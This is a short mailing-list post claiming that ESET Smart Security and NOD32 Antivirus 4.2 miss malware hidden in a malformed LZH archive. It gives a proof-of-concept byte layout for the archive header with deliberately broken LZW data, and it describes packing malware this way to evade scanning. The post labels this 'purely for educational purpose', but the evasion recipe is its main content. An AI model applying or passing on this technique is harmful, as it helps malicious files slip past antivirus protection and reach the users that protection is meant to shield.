Hi, As we know all Anti-Virus softwares have limited scope of protecting users from Malwares, this draft will show you how ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) are bypassing Viruses if speciall archived in an Format (LZH Archived)
The below will Compress the Malicious data into LZH Format POC : "5" # Compression method (LZW, Arithmetic Encoding) "\x20\x01" # File attribute "\x08" # File name length "VIRAL.TXT" # File name "\xDC\x41\x4D\x00\x00\x00\x0B\x33\x6D\x66\x49\x5D" # !!! broken LZW compressed data "\x23\x08\x8A\x78\x00\x00\xC0\x81\xA5\xC0\xD7\x20" # The above format speaks about the header and content to be specified in LZH archive Formatting. The malware is originally compressed and then this above header is written to a file and renamed with extension of LZH and then scanned with the AntiVirus softwares. *** It's purely for educational purpose. Regards, 0xN41K -- You received this message because you are subscribed to the Google Groups "nforceit" group. To post to this group, send an email to [email protected]. To unsubscribe from this group, send email to [email protected]. For more options, visit this group at http://groups.google.com/group/nforceit?hl=en-GB.
